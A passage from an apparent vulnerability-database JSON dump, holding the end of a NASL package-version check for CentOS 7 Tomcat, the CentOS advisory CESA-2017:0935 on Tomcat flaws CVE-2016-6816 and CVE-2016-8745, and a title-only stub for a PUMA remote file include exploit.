security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-servlet\", rpm:\"tomcat-servlet~3.0~api~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-05-29T18:34:54", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:0935\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es):\n\n* It was discovered that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request error when request contains characters that are not permitted by the HTTP specification to appear not encoded, even though they were previously accepted. The newly introduced system property tomcat.util.http.parser.HttpParser.requestTargetAllow can be used to configure Tomcat to accept curly braces ({ and }) and the pipe symbol (|) in not encoded form, as these are often used in URLs without being properly encoded. \n\n* A bug was discovered in the error handling of the send file code for the NIO HTTP connector. This led to the current Processor object being added to the Processor cache multiple times allowing information leakage between requests including, and not limited to, session ID and the response body. (CVE-2016-8745)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-April/022384.html\n\n**Affected packages:**\ntomcat\ntomcat-admin-webapps\ntomcat-docs-webapp\ntomcat-el-2.2-api\ntomcat-javadoc\ntomcat-jsp-2.2-api\ntomcat-jsvc\ntomcat-lib\ntomcat-servlet-3.0-api\ntomcat-webapps\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0935.html", "modified": "2017-04-13T11:00:11", "published": "2017-04-13T11:00:11", "href": "http://lists.centos.org/pipermail/centos-announce/2017-April/022384.html", "id": "CESA-2017:0935", "title": "tomcat security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}

PUMA &lt;= 1.0 RC 2 (config.php) Remote File Include Vulnerability

Description

Exploit for unknown platform in category web applications

PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability